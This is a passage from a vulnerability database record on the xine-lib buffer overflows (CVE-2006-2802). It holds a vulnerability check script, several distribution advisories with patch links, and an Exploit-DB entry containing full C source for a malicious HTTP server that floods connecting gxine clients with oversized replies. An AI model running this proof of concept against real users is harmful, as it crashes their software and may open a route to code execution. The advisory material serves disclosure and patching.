\"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"xine-lib\", ver:\"1.1.2-i686-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:04", "bulletinFamily": "unix", "description": "### Background\n\nxine is a high performance, portable and reusable multimedia playback engine. xine-lib is xine's core engine. \n\n### Description\n\nxine-lib contains buffer overflows in the processing of AVI. Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP plugin (xineplug_inp_http.so) via a long reply from an HTTP server. \n\n### Impact\n\nAn attacker could trigger the buffer overflow vulnerabilities by enticing a user to load a specially crafted AVI file in xine. This might result in the execution of arbitrary code with the rights of the user running xine. Additionally, a remote HTTP server serving a xine client a specially crafted reply could crash xine and possibly execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll xine-lib users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/xine-lib-1.1.2-r2\"", "modified": "2006-09-13T00:00:00", "published": "2006-09-13T00:00:00", "id": "GLSA-200609-08", "href": "https://security.gentoo.org/glsa/200609-08", "type": "gentoo", "title": "xine-lib: Buffer overflows", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:00:43", "bulletinFamily": "exploit", "description": "gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC. CVE-2006-2802. Dos exploit for linux platform", "modified": "2006-05-30T00:00:00", "published": "2006-05-30T00:00:00", "id": "EDB-ID:1852", "href": "https://www.exploit-db.com/exploits/1852/", "type": "exploitdb", "title": "gxine 0.5.6 HTTP Plugin Remote Buffer Overflow PoC", "sourceData": "//////////////////////////////////////////////////////\n// gxine - HTTP Plugin Remote Buffer Overflow PoC\n/////////////////////////////////////////////////////\n//\n// Federico L. Bossi Bonin\n// fbossi[at]netcomm[dot]com[dot]ar\n/////////////////////////////////////////////////////\n\n// TESTED on gxine 0.5.6\n////////////////////////\n\n// 0xb78eccc7 in free () from /lib/tls/libc.so.6\n// (gdb) backtrace\n// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6\n// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so\n// #2 0x41414141 in ?? ()\n// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1\n// #4 0x080b1810 in ?? ()\n// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1\n// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1\n// #7 0x0877c084 in ?? ()\n// #8 0x0930a931 in ?? ()\n// #9 0x080880a2 in defs.3 ()\n// #10 0xb0088478 in ?? ()\n// #11 0x00000000 in ?? ()\n\n#include <stdio.h>\n#include <sys/types.h> \n#include <sys/socket.h>\n#include <netinet/in.h>\n#define PORT 81\n#define LEN 9500\n\nvoid shoot(int);\n\nint main() {\nstruct sockaddr_in srv_addr, client;\nint len,pid,sockfd,sock;\n\nsockfd = socket(AF_INET, SOCK_STREAM, 0);\n\nif (sockfd < 0) { \nperror(\"error socket()\"); \nexit(1);\n}\n \nbzero((char *) &srv_addr, sizeof(srv_addr));\nsrv_addr.sin_family = AF_INET;\nsrv_addr.sin_addr.s_addr = INADDR_ANY;\nsrv_addr.sin_port = htons(PORT);\n\nif (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) {\nperror(\"error bind()\");\nexit(1);\n}\n\n\n\nprintf(\"Listening on port %i\\n\",PORT);\n\nlisten(sockfd,5);\nlen = sizeof(client);\n\nwhile (1) {\nsock = accept(sockfd, (struct sockaddr *) &client, &len);\nif (sock < 0) {\nperror(\"error accept()\");\nexit(1);\n}\n\npid = fork();\nif (pid < 0) {\nperror(\"fork()\");\nexit(1);\n}\nif (pid == 0) {\nclose(sockfd);\nprintf(\"Conection from %s\\n\",inet_ntoa(client.sin_addr));\nshoot(sock);\nexit(0);\n}\nelse close(sock);\n} \nreturn 0;\n}\n\nvoid shoot (int sock) {\nint i;\nfor (i=0 ; i < LEN ; i++) {\nwrite(sock,\"\\x41\",1);\n}\n\n}\n\n// milw0rm.com [2006-05-30]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1852/"}], "ubuntu": [{"lastseen": "2019-01-29T20:34:18", "bulletinFamily": "unix", "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input module. By tricking an user into opening a malicious remote media location, a remote attacker could exploit this to crash Xine library frontends (like totem-xine, gxine, or xine-ui) and possibly even execute arbitrary code with the user\u2019s privileges.", "modified": "2006-06-09T00:00:00", "published": "2006-06-09T00:00:00", "id": "USN-295-1", "href": "https://usn.ubuntu.com/295-1/", "title": "xine-lib vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:48", "bulletinFamily": "unix", "description": "\nA Secunia Advisory reports:\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib,\n\t which can be exploited by malicious people to crash certain\n\t applications on a user's system.\nThe weakness is cause due to a heap corruption within the\n\t \"xineplug_inp_http.so\" plugin when handling an overly large\n\t reply from the HTTP server. This can be exploited to crash\n\t an application that uses the plugin (e.g. gxine).\n\n", "modified": "2006-05-31T00:00:00", "published": "2006-05-31T00:00:00", "id": "107E2EE5-F941-11DA-B1FA-020039488E34", "href": "https://vuxml.freebsd.org/freebsd/107e2ee5-f941-11da-b1fa-020039488e34.html", "title": "libxine -- buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:04", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1105-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJuly 7th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : xine-lib\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2006-2802\nBugTraq ID : 18187\nDebian Bug : 369876\n\nFederico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, taht could\nallow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.0.1-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.1.1-2.\n\nWe recommend that you upgrade your libxine packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody5.dsc\n Size/MD5 checksum: 761 113ef134a39e2f37bc6395dc2e43b538\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody5.diff.gz\n Size/MD5 checksum: 2339 194c32b8c93f5e85c873454412f63552\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8.orig.tar.gz\n Size/MD5 checksum: 1766178 d8fc9b30e15b50af8ab7552bbda7aeda\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_alpha.deb\n Size/MD5 checksum: 261022 3314df47933eadc0af5b5cf4a36afdfe\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_alpha.deb\n Size/MD5 checksum: 816024 897664eee06d09f43375f5320be1f17b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_arm.deb\n Size/MD5 checksum: 302960 9dee75c3d13aabb5e83978e0d75ec4ce\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_arm.deb\n Size/MD5 checksum: 671494 dafc6c14181802dd56c887583bbf5140\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_i386.deb\n Size/MD5 checksum: 260788 3a98e4d713d1c341fe69a717c8de0072\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_i386.deb\n Size/MD5 checksum: 807996 1dd6e453aa93c420a145dd5397ee99bd\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_ia64.deb\n Size/MD5 checksum: 260864 46ae5bb7b3256421dd7291e7c8898369\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_ia64.deb\n Size/MD5 checksum: 953654 887b267a44c50e00f8bf9e2190852ca8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_hppa.deb\n Size/MD5 checksum: 260968 aa1ee745d7c5c6b9a8271c64f0a587a0\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_hppa.deb\n Size/MD5 checksum: 846792 60ed39365a0c67db2d4fba67d2ba1583\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_m68k.deb\n Size/MD5 checksum: 292718 2a87b508bcc610a01abf8c9c3773d40d\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_m68k.deb\n Size/MD5 checksum: 617706 67075fef400071473fa948e5dd89b8fc\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_mips.deb\n Size/MD5 checksum: 299478 5b0c49b3745472f71725dd052b60d712\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_mips.deb\n Size/MD5 checksum: 653086 0044bef2d6ebeb01385d1a20a716046a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_mipsel.deb\n Size/MD5 checksum: 299568 79851707d297d94d74b613d5abaa6b3a\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_mipsel.deb\n Size/MD5 checksum: 655030 0868f2d006c6b5282c8880a8460fed77\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_powerpc.deb\n Size/MD5 checksum: 261278 fc16e5e2889afdd2c73491714575d53f\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_powerpc.deb\n Size/MD5 checksum: 742454 6c2be22417b910c45c0bb113a4f7707b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_s390.deb\n Size/MD5 checksum: 302404 9d54d7d12b431358f99fe688e2999cb5\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_s390.deb\n Size/MD5 checksum: 662920 5da8cbae8d02f579e8150dde1b07c4f8\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_sparc.deb\n Size/MD5 checksum: 261104 30717fe03e13e5dfbd5adbf4dafd93eb\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_sparc.deb\n Size/MD5 checksum: 803816 fe08139ea1b35f3e7d5b7bcb8de20dd3\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge3.dsc\n Size/MD5 checksum: 1062 998afa8ddece7f06aac69cb8787b8bea\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge3.diff.gz\n Size/MD5 checksum: 3230 6b65bdac09c698d6dcfc9c01f417714b\n http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz\n Size/MD5 checksum: 7774954 9be804b337c6c3a2e202c5a7237cb0f8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_alpha.deb\n Size/MD5 checksum: 107646 53ba83cd587bed30cdbd5dd96a241e43\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_alpha.deb\n Size/MD5 checksum: 4829370 83e8d3ed71f20b06d4edcd1a97247903\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_amd64.deb\n Size/MD5 checksum: 107640 9be42e567a232db85ade634a8875cea1\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_amd64.deb\n Size/MD5 checksum: 3933392 03aaaf4b88fd5cc99ab7048e386a81eb\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_arm.deb\n Size/MD5 checksum: 107698 857f520bcc947238b6a1732239508e29\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_arm.deb\n Size/MD5 checksum: 3878442 e505d7fd20cff3d6965e0e55640e5da0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_i386.deb\n Size/MD5 checksum: 107702 56fb77a0b6f0d01b3eb7cff160b7fc2e\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_i386.deb\n Size/MD5 checksum: 4204886 3fb1c5b93a8bd2857f8da12f95a0c144\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_ia64.deb\n Size/MD5 checksum: 107648 e5540cc5bbe66e9565fc412d7d37a23d\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_ia64.deb\n Size/MD5 checksum: 5620728 800474cd0356d391f8ac843104de8057\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_hppa.deb\n Size/MD5 checksum: 107676 8f22e952357456fe6f92217a6305a54b\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_hppa.deb\n Size/MD5 checksum: 3600400 aff888a7efd1cc00072cc3bdd1c88a70\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_m68k.deb\n Size/MD5 checksum: 107720 97d1027b157b256611e234ce20c76337\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_m68k.deb\n Size/MD5 checksum: 3175260 ee6cef5deb75f0396b13013602f30b90\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_mips.deb\n Size/MD5 checksum: 107654 639d0ee2c65047864b5c726dfba30fcf\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_mips.deb\n Size/MD5 checksum: 4066606 b7beb0cb4615f6ca98b4fbff3be16c06\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_mipsel.deb\n Size/MD5 checksum: 107678 ba9bb94702fcf451db6dde218e23bc21\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_mipsel.deb\n Size/MD5 checksum: 4125476 fc4b6816829beff3ba2fbd175e7e1384\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_powerpc.deb\n Size/MD5 checksum: 107686 0ce2a02a85fd72b5bb24213fc025f864\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_powerpc.deb\n Size/MD5 checksum: 4305544 68c2be929520c8a45439d36ef8d0a2ca\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_s390.deb\n Size/MD5 checksum: 107652 63c9659dc1e004412faf09d9feafee08\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_s390.deb\n Size/MD5 checksum: 3880838 b747276fe66ef57341430e10adc32fee\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge3_sparc.deb\n Size/MD5 checksum: 107666 045189d3cd49c72f4e4bf26ea391fec1\n http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge3_sparc.deb\n Size/MD5 checksum: 4360438 15333a715e57287c63f2f2f36b40ec80\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-07-07T00:00:00", "published": "2006-07-07T00:00:00", "id": "DEBIAN:DSA-1105-1:129E4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00192.html", "title": "[SECURITY] [DSA 1105-1] New xine-lib packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:41", "bulletinFamily": "unix", "description": "New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2802\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/xine-lib-1.1.2-i686-1.tgz:\n Upgraded to xine-lib-1.1.2.\n According to xinehq.de's announcement:\n There are three security fixes:\n - CVE-2005-4048: possible buffer overflow in libavcodec (crafted PNGs);\n - CVE-2006-2802: possible buffer overflow in the HTTP plugin;\n - possible buffer overflow via bad indexes in specially-crafted AVI files.\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/xine-lib-1.1.2-i686-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-lib-1.1.2-i686-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\nd5d3dcd06fd6cc4f68d2a4717f507f21 xine-lib-1.1.2-i686-1.tgz\n\nSlackware -current package:\na82c9b20ccaec12f770cc1e4f63511d7 xine-lib-1.1.2-i686-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg xine-lib-1.1.2-i686-1.tgz", "modified": "2006-07-26T14:25:49", "published": "2006-07-26T14:25:49", "id": "SSA-2006-207-04", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.391759", "title": "xine-lib", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}